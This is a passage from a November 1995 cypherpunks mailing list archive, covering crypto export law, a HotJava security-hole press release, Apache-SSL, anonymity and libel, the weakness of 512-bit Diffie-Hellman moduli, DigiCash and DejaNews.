> > >  Vienna, Virginia (USA) site ...
> 
> ...a major router at a major interconnect run by UUNET, a major provider.
> datasrv appaently contracted with UUNET for traffic.  Naturally it would
> go through their network, which is centered in the US.

So, if this person was sending cryptographics codes from Switzerland
to Israel, the code would have been imported to the US, then exported
by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
but it might be something to threaten UUNET with if one of their Northern
Virginia neighbors ever wanted something the couldn't get otherwise.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 7 Nov 1995 01:00:50 +0800
To: cypherpunks@toad.com
Subject: PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE
Message-ID: <199511061552.HAA06343@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release
Date: Nov 6th, 1995
Contact: Sameer Parekh 510-601-9777 sameer@c2.org

PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE

Two Princeton University grad students, Dan Wallach and Drew Dean,
recently discovered holes in Sun Microsystem's HotJava web browser. In
response to this finding, Community ConneXion, well known for offering
rewards for exposing holes in internet security products, has decided
to award them with a t-shirt and expand the Community ConneXion Hack
line of promotions to include Java and Java-related products.

Sun's Java product is alleged to allow people browsing the
World-Wide-Web to execute programs on their own computers without
worrying about whether or not the programs were viruses or not. The
holes Wallach and Dean found show that there are a few things in the
HotJava alpha implementation of the Java language which make viruses
and other malicious programs possible within the alpha HotJava
web browser.

"We were very impressed with the HotJava concept, so we thought it
would be good to poke around their implementation," said Wallach.
"While we did find some interesting holes, we believe these can be
addressed and Java could make a good standard for remote code on the
Web, if an effective security policy is defined."

Wallach and Dean released their findings initially in the RISKS
Digest, and plan to publish a paper detailing their results. The holes
they found make it possible for a malicious applet to set things up so
as to be able to monitor or modify all of a given web-surfer's
activity, after they ran the malicious applet exploiting the holes. By
doing so the applet may make it possible to violate user's privacy by
revealing to an third party their web traffic.

The holes they found exist only in the alpha release of HotJava. The
beta release, which is the version found in the widely-used Netscape
Navigator 2.0b1J is not vulnerable to these attacks.

"I don't want to be in the t-shirt business," said Sameer Parekh,
President of Community ConneXion, "but we felt that these students'
work deserved a t-shirt. Java has great potential for making the
Internet much more powerful than it already is. It is very important
that we examine Java and make sure that we can trust it." Community
ConneXion, in addition to this Hack Java t-shirt promotion, is
offering t-shirts to people who find holes in Netscape, Microsoft, and
DigiCash.

Information about the Hack Java promotion is available from
http://www.c2.org/hackjava/.

Community ConneXion is the premier internet privacy ISP. They offer
anonymous accounts, remailers, and psuedonym servers, in addition to
the standard ISP fare of webspace and dialup IP access. Information is
available from http://www.c2.org/ or from sending email to
info@c2.org.

Java and HotJava are trademarks of Sun Microsystems, Inc. Netscape and
Netscape Navigator are trademarks of Netscape Communications
Corporation. The Hack Java promotion is not affiliated with nor
sponsored by Sun Microsystems.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Mon, 6 Nov 1995 22:35:06 +0800
To: shields@tembel.org (Michael Shields)
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <199511061406.IAA07351@galil.austnsc.tandem.com.>
MIME-Version: 1.0
Content-Type: text/plain


shields@tembel.org (Michael Shields) said:

MS> If the InterNIC yanked your domain, this would *not* affect your IP
MS> connectivity -- your ability to be reached by any Internet protocol
MS> via IP address.  The InterNIC has nothing at all to do with that.

	I never disputed that subverting the DNS system would affect the
ability to use numeric IP addresses, just IP names.  But knowing that
there are multiple 'root' DNS servers makes me a bit more comfortable.
But only a little bit - despite my being one of what is generally
referred to as the 'religious right', the pro-censorship tendencies of
the political 'leaders' pandering to it makes me very uncomfortable (the
"and when they came to censor me, no one was left to protest" concept
[with apologies to the writer of the original version referring to the
Holocaust]).

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 7 Nov 1995 01:18:06 +0800
To: cypherpunks@toad.com
Subject: SSL-encrypted apache web server available for beta-test
Message-ID: <199511061607.IAA07644@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I put together an SSL/Apache using mostly other people's work,
but some of my own. It's available for beta-test to use non-commercial
to US-persons. See http://www.c2.org/apachessl/

	The README is attached.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org
"I don't want to get into the t-shirt business."

	The release of Apache supports SSL, using Eric Young's SSLeay
package and RSADSI's RSAREF cryptography library. Ben Laurie
<ben@algroup.co.uk> wrote the interfaces to SSL within the Apache server,
which was developed by the Apache Group.

	This release of Apache-SSL is maintained by sameer
<sameer@c2.org>. For more information on sameer's releases of
Apache-SSL see http://www.c2.org/apachessl/.

	For more information on Apache see http://www.apache.org/

	For more information on SSLeay see
http://www.psy.uq.oz.au/~ftp/Crypto/

	For more information on RSAREF see http://www.rsa.com/

	Portions developed at the National Center for Supercomputing
Applications at the University of Illinois at Urbana-Champaign. This
product includes software developed by Ben Laurie for use in the
Apache-SSL HTTP server project.

	Use of this software is allowed for non-commercial use only,
as described in the RSAREF license. For information on commercial use
of this software, please see http://www.c2.org/apachessl/.

	This package is using Apache 0.8.14 -- not the most recent
version of Apache. While every effort will be made to keep this
package up to date with the most recent Apache version, that can not
be guaranteed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 6 Nov 1995 21:58:57 +0800
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Crypto++, Cpunk Icons, list noise
In-Reply-To: <9511061141.AA16901@all.net>
Message-ID: <Pine.3.89.9511060841.B27224-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:

> In the United States, we have the right to express whatever view we
> wish, so long as it doesn't endanger others (e.g., insight to riot,
> scream "fire" in a crowded theater when there is no fire, etc.). 
> Everyone has an inherent right to question why a person seeks moments of
> anonymity or privacy. 

You're forgetting our good friends the libel laws. Another reason to go anon.
You have the right to say whatever you please, but you'll have to be able 
to defend it in court if it damages someone's reputation. It can also get 
you fired. (or shot if you're MLK) 

This is why It'd be so nice to see more idiot-friendly remailer clients
on windoze, or even better Java (does Private Idaho support Mixmaster yet?).
The average person can really benefit from easy anonymity, otherwise they 
won't bother and get in hot water.

Slander is in the eye of the beholder.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 22:18:46 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Crypto++, Cpunk Icons, list noise
In-Reply-To: <Pine.3.89.9511060841.B27224-0100000@tesla.cc.uottawa.ca>
Message-ID: <9511061335.AA24370@all.net>
MIME-Version: 1.0
Content-Type: text


s1113645@tesla.cc.uottawa.ca typed:

> On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:
> 
> > In the United States, we have the right to express whatever view we
> > wish, so long as it doesn't endanger others (e.g., insight to riot,
> > scream "fire" in a crowded theater when there is no fire, etc.). 
> > Everyone has an inherent right to question why a person seeks moments of
> > anonymity or privacy. 
> 
> You're forgetting our good friends the libel laws. Another reason to go anon.
> You have the right to say whatever you please, but you'll have to be able 
> to defend it in court if it damages someone's reputation. It can also get 
> you fired. (or shot if you're MLK) 

The anonymity will not protect you very well against libel laws.  The
provider will be suied for libel, and unless they reveal your identity,
they will likely lose in court.  If they cannot reveal the identity,
they will also likely lose the suit.  All the anonymous providers are
doing is giving you anonymity in exchange for their liability.  Even
international anonymity systems are not imune to such threats, as we have
been shown by the Church of whatever.

> This is why It'd be so nice to see more idiot-friendly remailer clients
> on windoze, or even better Java (does Private Idaho support Mixmaster yet?).
> The average person can really benefit from easy anonymity, otherwise they 
> won't bother and get in hot water.

If it's just a license to slander people, I don't want to support
anonymity.  There are valid reasons for remaining anonymous, but being
able to avoid liability for slander is not one of them.

> Slander is in the eye of the beholder.

Slander is in the realm of the courts to decide - at least in the U.S.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Mon, 6 Nov 1995 06:49:26 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
Message-ID: <199511052237.JAA25268@iccu6.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


>
>Anonymous writes:
>> >  Notice that both messages went through an unnamed site -- 134.222.9.1 and
>> >  then a strangely-named site, "lp (134.222.35.2)"
>[...]
>> >  Now let me see ... which spy agencies are located in or near Virginia?
>

 A hopcheck from here puts these sites in amsterdam nl.

cheers

peter


                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship@gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 6 Nov 1995 22:11:20 +0800
To: roger12@cam.org
Subject: Re: Magic Money
In-Reply-To: <951106025715_99002994@emout06.mail.aol.com>
Message-ID: <Pine.3.89.9511060823.A27224-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 6 Nov 1995 EWilhem@aol.com wrote:

> Where do I get the software, Please E-mail me at roger12@cam.org. I'd like
> the 
> evaluation software.
> 
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/applications/magic-money
It's freeware as far as I know.
Just curious folks, is anyone still using this? Was there ever any active 
playing with it? What's the story? (if there is one)

Ps. Is that the cam in Montreal?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 22:24:54 +0800
To: cypherpunks@toad.com
Subject: Re: Keyed-MD5, and HTTP-NG
In-Reply-To: <199511060639.WAA20500@jobe.shell.portal.com>
Message-ID: <199511061357.IAA14010@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Someone adopting Detweilers style writes:
> Hmmm, I guess (as usual) people weren't keeping up with the drafts.  It 
> really makes some of us outsiders wonder what the IETF actually does in 
> its gilded white towers.

Just so that people understand this is a Detweiler troll, and an
attempt by him to start up a flame war/fight.

The IETF is perhaps the single easiest technical standards
organization in the world to participate in. You join the mailing list
for any working group and you are as full a member as you can be. Show
up at any IETF meeting, and you are a full participant. All
discussions occur in the open, are posted on line, most meetings are
broadcast worldwide on the MBONE. All drafts are public, all documents
are free.

Detweiler of course knows this, but would like us to argue with him,
and hopefully with each other.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 01:59:08 +0800
To: cypherpunks@toad.com
Subject: So much for free speech...
Message-ID: <acc37a5b03021004553e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:34 PM 11/6/95, s1113645@tesla.cc.uottawa.ca wrote:
>On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote:
>
>> In the United States, we have the right to express whatever view we
>> wish, so long as it doesn't endanger others (e.g., insight to riot,
>> scream "fire" in a crowded theater when there is no fire, etc.).
>> Everyone has an inherent right to question why a person seeks moments of
>> anonymity or privacy.
>
>You're forgetting our good friends the libel laws. Another reason to go anon.
>You have the right to say whatever you please, but you'll have to be able
>to defend it in court if it damages someone's reputation. It can also get
>you fired. (or shot if you're MLK)


Sadly, the tradition of "free speech" is under assault. On many fronts. The
new "civil rights" laws are just one avenue for the suppression of what was
once considered free speech.

Submitted for your disapproval:

"13-year-old student arrested for racial slurs" (Santa Cruz Sentinel, p. 1,
3 November 1995)

by Michael Green, Redding Record Searchlight

"REDDING -- When a 13-year-old Redding student was arrested for allegedly
making racial slurs, police and school administrators said it was necessary
to maintain order and send a strong message against racism.

"But some legal experts take a dimmer view of the boy's arrest, saying that
calling someone names, even offensive ones, is not a crime and in fact is
constitutionally protected.

...


"The Redding-area boy, who is white, allegedly made racial insults toward a
12-year-old Hispanic student before being arrested last Thursday.

...

"Police Chief Bob Blankeship said he would encourage officers to use the
civil rights laws to stop racial harassment if prosecutors determine it is
appropriate.

...

"The boy was arrested on suspicion of violating the Hispanic student's
civil rights. Penal Code section 422.6 makes it a misdemeanor to interfere
with another person's rights or harm their property because of their race,
gender, religion, disability or sexual orientation."

-----

Wow! "Verbal abuse." Throw away the key. "Freedom does not mean the freedom
to think bad thoughts," as Big Bro once said.

If they don't get you for illegally using random numbers, they'll get you
for uttering incorrect words.

Back to reality. No word on whether prosecution will take place (I doubt
it...this will likely be dropped, now that the message has been sent to the
students, and now that civil rights folks are getting interested).

Children are usually not accorded full constitutional protections,
especially not in public schools, but this does not mean the police should
arrest those who utter the wrong words! (Maybe suspending the student,
though I certainly wouldn't do that.)

This is the "safe and secure" world we are in, where bad thoughts and bad
words are punished. Or threatened with lawsuits. Anarchy seems infinitely
preferable to me.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 22:34:55 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto++, Cpunk Icons, list noise
In-Reply-To: <199511061050.CAA17098@jobe.shell.portal.com>
Message-ID: <199511061404.JAA14024@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> Hmmm, I'm not sure that anyone has an inherent right to question WHY a
> person seeks moments of anonymity or privacy.

In your case, Detweiler, it appears to be because you want to cause us
to flame at each other and disrupt the list without our noticing who
is responsible. I'd say that is a questionable motive.

> Please allow me the boundary and dignity to choose when, where, and in 
> what form I choose to reveal myself.

You already have.

> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> 

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 6 Nov 1995 22:28:41 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto++, Cpunk Icons, list noise
In-Reply-To: <199511061050.CAA17098@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9511060807.B27490-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 6 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> And as the messenger, I (hope) I don't have anything to fear, from the NSA
> or any other foreign group that would seek to pursue its own agenda within
> the borders of sovereign Canada.  I really don't think that the NSA is
> "evil incarnate", as some list subscribers do.  They have their
> intelligence and know how to use it.  Usually, they use it prudently.
 
They have a nice friend (the author of Spyworld would say outpost) right here
in Ottawa at the Communications Security Establishment. They (CSE) seem to 
have done some recent spying on the opposition parties and Quebec 
separatists (so I vaguely recall having read in several places. I haven't 
gotten around to Spyworld yet). It was rather funny to see them 
recruiting on campus. If you're ever in town, they're just a bit past 
Carleton U. on Heron. (it doesn't say CSE on the signs, but the guy at the
gate will tell you so)

Try <http://www.cse.dnd.ca> it's a tad sparse, but entertaining all the same.
They have very friendly recruiting brochures. Like NSA, they're also an equal
opportunity employer (;-> ).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 7 Nov 1995 02:38:28 +0800
To: hugh@toad.com
Subject: New sendmail coming on toad.com; expect disruptions
Message-ID: <9511061822.AA28208@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hugh and I will be installing a new sendmail on toad over the next day
or two.  You can expect some delays and troubles from the list over
that period as we shake it down.  We hope that the result will be
faster and better service for y'all.

	John Gilmore





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 7 Nov 1995 02:53:56 +0800
To: tcmay@got.net
Subject: Re: So much for free speech...
In-Reply-To: <acc37a5b03021004553e@[205.199.118.202]>
Message-ID: <199511061833.KAA27054@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:
[...]
> Wow! "Verbal abuse." Throw away the key. "Freedom does not mean the freedom
> to think bad thoughts," as Big Bro once said.
[...]

Indeed. The conviction on my criminal record for verbal abuse is one
of the things that opened my eyes to the true state of "free speech"
in this country.

Raph

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAwUBMJ5U42RuKj5D5x2JAQH0BgF9FxkKs0cRM/Ri0yvUKTnu5Q/2QAaEFVcD
rU6aruVdEN+j3iXOF0ot3mNRqoKc3nYN
=03DF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 7 Nov 1995 01:11:21 +0800
To: thad@hammerhead.com (Thaddeus J. Beier)
Subject: Re: lp ?
In-Reply-To: <199511061539.HAA04245@hammerhead.com>
Message-ID: <199511061605.LAA14164@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Thaddeus J. Beier writes:
> So, if this person was sending cryptographics codes from Switzerland
> to Israel, the code would have been imported to the US, then exported
> by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
> but it might be something to threaten UUNET with if one of their Northern
> Virginia neighbors ever wanted something the couldn't get otherwise.

It isn't clear that telecoms treaties don't implicitly make this legal
in spite of the export regulations.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Tue, 7 Nov 1995 01:02:02 +0800
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <9511061509.AA10512@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:06 AM 11/6/95 -0600, Stan Drescher wrote:
>shields@tembel.org (Michael Shields) said:
>
>MS> If the InterNIC yanked your domain, this would *not* affect your IP
>MS> connectivity -- your ability to be reached by any Internet protocol
>MS> via IP address.  The InterNIC has nothing at all to do with that.
>
>	I never disputed that subverting the DNS system would affect the
>ability to use numeric IP addresses, just IP names.<snip>


  There has been a thought that's been in the back of my mind while reading
this thread. For example, at one time, the telephone companies used "names"
such as Klick 5-1234.  Later, they went to all numbers, i.e., 555-1234.
People balked, but they eventually got used to it.  There are other examples
not necessary to list here.
  If, however, the growth continues with people, not only accessing the net,
but getting domain names - doesn't it seem likely that, at some point, only
IP addresses will be left (or dumb domain names like http://www.stkdlcp.com)?
  Ergo, what is the problem with having a numerical URL?  After all, some
people's URL's (in name form) are not the easiest to remember.  In the long
run, numbers may be easier to remember.  Just think of how many numbers
(Soc. Sec. #'s; phone #'s; tax #'s, etc.) that we have committed to memory.
Plus, one doesn't have to worry about InterNIC yanking your domain - and
other related problems.
  Just my .02 cents worth....
  

********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison@mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Tue, 7 Nov 1995 03:52:48 +0800
To: cypherpunks@toad.com
Subject: Recovering lost coins in ecash
Message-ID: <199511061916.LAA19291@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> One problem a number of people have reported in DigiCash is disappearing
> money. Several people have reported that if a transfer is misconfigured
> the cash can flow out of the wallet, be rejected at the other end and
> disappear from the system - i.e. misprinted names on cheques mean lost cash!
 
These users need to learn the features of the software.  Backups of spent 
coins are retained in the payment history ledger.  Select the payment from
the ledger, and hit _Cancel_ to cancel the payment.   This credits the
lost coins to your account.

The story behind this (which is, alas, not so apparent to the user) is that
this essentially spends the coins at the bank, so that if they were lost, 
the amount will be credited to your account.  If the coins were already 
cleared and credited to the payee then you ask the payee for your money 
back (or to properly deliver the purchased service), relying on their 
business reputation (ie, complain loud and publically if you don't get 
satisfaction).  For the latter case an escrow service would be a useful
third-party add-on to the basic ecash system, to allow exchanges in
larger amounts without incurring this risk from the payee.

This bit of electronic magic is one place where ecash is superior 
to physical cash -- but at the expense of not being obvious 
from the metaphor.  It also illustrates the superior flexibility of
online clearing -- double spending is used as an error recovery tool,
to find out whether the payment was in fact lost, rather than as an 
indication of fraud.

Nick Szabo                              szabo@netcom.com  
Internet commerce consultant




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Tue, 7 Nov 1995 01:46:44 +0800
To: perry@piermont.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511051607.LAA08575@jekyll.piermont.com>
Message-ID: <9511061646.AA25242@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   X-Authentication-Warning: jekyll.piermont.com: Host localhost didn't use HELO protocol
   Cc: cypherpunks@toad.com, ipsec-dev@eit.com
   Reply-To: perry@piermont.com
   X-Reposting-Policy: redistribute only with permission
   Date: Sun, 05 Nov 1995 11:07:25 -0500
   From: "Perry E. Metzger" <perry@piermont.com>
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   "William Allen Simpson" writes:
   > Folks, I was somewhat disappointed in the response to our previous
   > requests for verification of the strength of the prime moduli.
   > 
   > Recently, someone asked for a smaller prime of only 512-bits for speed.
   > This is more than enough for the strength of keys needed for DES, 3DES,
   > MD5 and SHA.  Perhaps this would be easier to have more complete and
   > robust verification as well.

   I think that this is a very large mistake. Allow me to explain why.

   La Macchia (sp?) and Odlyzko (sp?) have a very nice result which shows
   that once you've done enough precalculation on a particular modulus,
   you can break any subsequent Diffie-Hellman operation performed on
   that modulus with (for our purposes) no effort. 512 bits is, from what
   I can tell, not far out of the realm of possibility for what someone
   could try to crack with current machines given enough effort.

Perry is correct; allow me to add some details.  The discrete log
problem is "brittle": for a given prime modulus p you have to spend a
lot of effort to calculate the first discrete log modulo p, but
subsequent discrete logs modulo p are easy to find.  Basically, you (a)
do a lot of precomputation to compute discrete logs for a set of
small(-ish) primes, and then (b) you combine these to find the
particular discrete log you're interested in.  For the second (and
subsequent) discrete logs modulo p you only have to do part (b), which
is pretty easy.

Our practical experiences with discrete logs suggests that the effort
required to perform the discrete log precomputations in (a) is slightly
more difficult than factoring a composite of the same size in bits.  In
1990-91 we estimated that performing (a) for a k-bit prime modulus was
about as hard as factoring a k+32-bit composite.  [Recent factoring work
has probably changed this a bit, but it's still a good estimate.]

Finally, remember that if the modulus in your appliation is public and
fixed (as it usually is) then you've got a very tempting target for me
to attack.  Once I do the precomputations I can break/subvert/read any
particular D-H exchange I want for little additional effort.  You have
to consider the amount of effort someone might bring to bear against
your entire system, not only against a particular transaction.  Breaking
a particular 512-bit RSA key might not be worth the effort if it just
gets me your encrypted e-mail (or whatever), but a 512-bit D-H modulus
in a widely deployed system is ripe for attack.

See our paper (available from http://www-swiss.ai.mit.edu/~bal/) for all
the juicy details.

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 7 Nov 1995 04:23:22 +0800
To: cypherpunks@toad.com
Subject: Re: Credentials Without Identity
Message-ID: <199511061951.LAA14798@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 13:35 11/5/95 +0100, Mats Bergstrom wrote:
>This applies very much so in Sweden too. It *is* illegal to maintain any
>database with 'information on persons' (like their email addresses) without
>approval from the Data Inspection. But it's an open secret that this law
>is broken on a massive front and no bureaucrat is really trying to uphold it.

So the address book I keep in my hip pocket is illegal!


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 05:17:01 +0800
To: cypherpunks@toad.com
Subject: DejaNews all over again--a URL for Usenet Searching
Message-ID: <acc3adfa0702100476eb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I usually avoid passing on URLs of interesting sites, in the name of
conserving bandwidth (*), but this one really has me jazzed:

http://dejanews.com/

It allows searching of Usenet archives (a few months' worth, from what I
can see).

This was pointed out to me on the Cyberia list, by Eugene Volokh, who wrote:

"    Check out http://dejanews.com/ -- truly a remarkable service.
They index a huge number of Internet news groups, and let you search
through them for any word or words you want.

"    Want to know what people are saying about some new book?  About
some political topic?  Most importantly, about you behind your back?
Check it out!  Lots of fun, and a bit scary."

A good way for newcomers to find out what's been written on some topic that
interests them, or to see who's writing what. (I checked out the index for:
"Blacknet," "Chaum," and a bunch of other things...the possibilities are
endless, and I suspect this will be the URL I go to more often than any
other.)

--Tim May

(* Perhaps someday we might ask people what their favorite URLs are. We've
done polls on books, so why not URLs?)

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 7 Nov 1995 02:02:18 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511040030.TAA28181@opine.cs.umass.edu>
Message-ID: <9511061741.AA23439@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Suppose I have serious and plausibly realistic aspirations to become an 
>authority in some subtopic of cryptography, network security, etc. (sometime 
>well into the next millenium). Am I more likely to learn and hone my skills
>by actively participating (sticking my neck out) or merely lurking
>indefinitely ?  Regardless of the answer to the previous question, should
>the list suffer me my missteps and naivete ?

This dependsd on what you are attempting to do. If you are attempting to
not be thought a fool by anyone then keep quiet. If you want to learn
something then you have to speak up.

If you have an idea then the only way to know if it is any good is to 
test it. In the sciences we perform experiments. In engineering and 
social sciences this is not necessarily possible. We can still test an
idea by voicing it and looking at the response. This is the heart of 
Habbermass's theory of communicative action (modulo it is impossible
to communicate such a complex set of ideas in a single paragraph).

Just because the response to an idea is hostile does not make it invalid
however, the quality of the responses matters. If you get back a reasoned
argument you may judge it on the basis of the plausibility of its axioms
and the correctness of its logic - accepting that the argument may be
incomplete and not fully explain the point of view.

If on the other hand people write "This is wrong and I've told the
person why in secret" then the argument probably isn't valid. The funniest
version of this type of post being the "Here is an example of what is
wrong, I won't waste bandwidth here explaining the faults even though
I have already done so in making the post in the first place. So I have
not only wasted bandwidth but interrupted a lot of people with a vacuous post.


To address perrys point on social security privatisation, If there was such
a proposal and the basis on which it were to be run was that the privatised
company would gain all the data rights then I think there would be the
very type of political debate that characterises clipper.

One thing about the "new" key escrow system that people have not picked
up on. Would you trust Microsoft to be a key agent if you were Lotus or 
vice-versa? Why on earth should private key escrow be any better?


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 7 Nov 1995 02:06:57 +0800
To: "James A. Donald" <cypherpunks@toad.com
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <199511042303.PAA29063@blob.best.net>
Message-ID: <9511061746.AA11219@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>This of course is the basic evil of government regulation:  Bricks are
>dangerous.  Two by fours are dangerous.  Water is dangerous.  Playgrounds
>are dangerous.  Everything is dangerous, because everything could be used 
>to cause harm, deliberately or accidentally.

You miss the central point. The NSA are simply one link in a beuracratic
chain. Their behaviour is determined by their position in that chain and
the nature of the question they are asked. If we could change the 
question they were asked from "is this dangerous" to "is this significantly
more dangerous than allowing ownership of guns" we might get somewhere.

	Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Usuario Acceso2 <acceso2@diatel.upm.es>
Date: Tue, 7 Nov 1995 22:43:47 +0800
To: cypherpunks@toad.com
Subject: Wich pgp is stronger?
Message-ID: <222*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>
MIME-Version: 1.0
Content-Type: text/plain


Hi C'punks:

Wich pgp is supposed to be stronger, 2.6.2 or 2.6.2 i?

What are exactly the differences between them?

Thanks, Jaime





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
